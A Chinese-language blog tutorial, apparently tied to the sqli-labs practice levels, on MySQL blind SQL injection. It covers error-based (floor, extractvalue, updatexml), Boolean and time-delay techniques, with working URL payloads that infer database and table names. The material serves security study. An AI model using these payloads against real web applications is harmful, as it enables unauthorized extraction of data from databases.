sql盲注


报错注入:适用于数据库报错会将报错信息带到页面
数据库名为test
①、floor报错注入
floor():向下取整,比如0.6返回0,1.1返回1
Rand():返回0到1的随机数
floor( RAND()*2):返回0或1
select count(*),CONCAT(database(),floor( RAND()*2))a FROM student GROUP BY a
需要count,floor( RAND()*2),和group by结合才会报错,用concat将数据带出
报错如下:Duplicate entry ‘test0’ for key ‘<group_key>’
报错原理:group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,
又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句执行后的结果。
限制:在mysql数据库高版本中floor报错不会将敏感信息带出
参考链接:https://blog.csdn.net/m0_60339103/article/details/125890455
②、extractvalue报错注入
extractvalue(目标xml文档,xml路径) :对XML文档进行查询的函数
select*FROM student WHERE id=1 AND extractvalue(“anything”,concat(“~”,database()))
报错如下:XPATH syntax error: ‘~test’
原理:通过在函数中写入不符合语法格式的xml路径达到报错的目的(比如写入~)
③、updatexml报错注入
UpdateXML(xml_target, xpath_expr, new_xml):更新选定XML片段的内容
xml – taeget:是我们需要操作的xml片段;
xpath -expr:和上面的一样,是需要更新的路径;
xml -xml:是更新后的的xml字段;
select*FROM student WHERE id=1 AND updatexml(“anything”,concat(“~”,database()),”anything”)
报错如下:XPATH syntax error: ‘~test’
原理:通过在函数中写入不符合语法格式的xml路径达到报错的目的

布尔注入(适用于数据库能查询到数据和查询不到数据页面返回不同,但是数据不会显示在页面)
步骤:猜敏感数据长度,通过substr,regexp逐个逐个字符猜测,如果有多条记录,可以通过limit逐次返回一条记录
靶场:sql-lab第八关
left(str,len):从左往右截取指定长度的字符串,str为接收的字符串,len为截取的长度
示例:left(‘Hello World’,3)结果为’Hel’
substr(str,pos,len):从起始位置截取指定长度的字符串,str为接收的字符串,pos为起始位置,len为长度。
示例:substr(‘Hello World’,2, 3)结果为’ell’
regexp正则表达式
like模糊匹配

STRCMP(Str1,Str2)
如果
Str1=Str2:0
Str1<Str2:-1
Str1>Str2:1
ascii(str):
返回字符串中第一位的ascii值,str为接收的字符串。
示例:ascii(‘hello’)结果为104,因为h的ascii值为104。
length(str)
ord(str)函数与其类似
?id=1′ and length(database())=8 –+ 猜测数据库长度
使用like结合substr逐个判断字符
?id=1′ and substr(database(),1,1) like ‘s’ –+
使用等于结合substr来逐个判断字符
?id=1′ and ord(substr(database(),1,1))=115 –+猜当前数据库第一个字段是不是’s’
使用正则(regexp )结合substr逐个判断字符
?id=1′ and substr(database(),1,1) regexp ‘s’ –+
使用strcmp结合substr逐个判断字符
strcmp等于的时候为false,不等于的时候为true
?id=1′ and strcmp(ord(substr(database(),1,1)),115) –+

使用使用limit和正则表达式猜测数据库第一张表是否以u开头
?id=1′ and 1=(select 1 from information_schema.TABLES where table_schema=”security” and table_name regexp “^u” limit 0,1) –+
left的使用
?id=1′ and left(database(),8)=”security” –+猜测数据库从左往右8截取的字符串是否为security

 

时间延迟注入(适用于页面不会显示数据,数据库报错也不会将报错信息显示到页面,查询的到数据和查询不到数据页面返回相同,但是可以通过函数将sql查询时间变长,页面响应变慢)
步骤:与布尔盲注类似,同样是猜敏感数据长度,通过substr,regexp逐个逐个字符猜测,如果有多条记录,可以通过limit逐次返回一条记录,但是由于页面没有变化,所以如果猜测结果可以用是否延迟来判断
利用函数:sleep()和benchmark(count,expr)。
BENCHMARK()函数是用来判断某个操作的运行性能,返回值一直是0。
expr是操作语句,count是操作次数。

靶场:sql-lab第九关
?id=1′ and if(ord(substr(database(),1,1))=115,sleep(5),1) –+
case when替换if
?id=1′ union select 1,2, case when ord(substr(database(),1,1))=115 then sleep(5) else 0 end–+

?id=1′ and case when ord(substr(database(),1,1))=115 then sleep(5) else 0 end–+
and或or替换if
?id=1′ and ord(substr(database(),1,1))=115 and sleep(5) –+
参考链接:https://www.modb.pro/db/104064

 

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/280151.html

(0)
上一篇 2022年8月12日
下一篇 2022年8月12日

相关推荐

发表回复

登录后才能评论